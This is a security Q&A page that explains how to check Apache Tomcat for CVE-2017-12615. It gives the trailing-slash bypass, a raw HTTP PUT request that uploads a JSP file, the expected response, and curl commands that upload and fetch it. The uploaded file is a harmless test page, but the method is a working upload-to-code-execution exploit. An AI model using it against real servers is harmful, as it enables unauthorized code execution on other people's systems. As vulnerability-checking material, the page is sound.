Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Question

How can I check Apache Tomcat remote code execution vulnerability (CVE-2017-12615)?

1 Answer

onto · Answer 1 · 2019-05-12T08:04:45+0000

You can bypass the file extension check by inserting a '/' character after the filename's extension.

HTTP Request:

PUT /file.jsp/
Host: localhost:port
Connection: close
Content-Length: 85
<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

Expected response if successful

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit using 'curl':

Create a .jsp file (e.g. testfile.jsp):

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

cURL command on target server:

curl -X PUT http://localhost:port/testfile.jsp/ -d @- < testfile.jsp

Check the file by browsing to the target address or:

curl http://localhost:port/testfile.jsp

Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

How can I check Apache Tomcat remote code execution vulnerability (CVE-2017-12615)?

Please log in or register to answer this question.

1 Answer

Please log in or register to add a comment.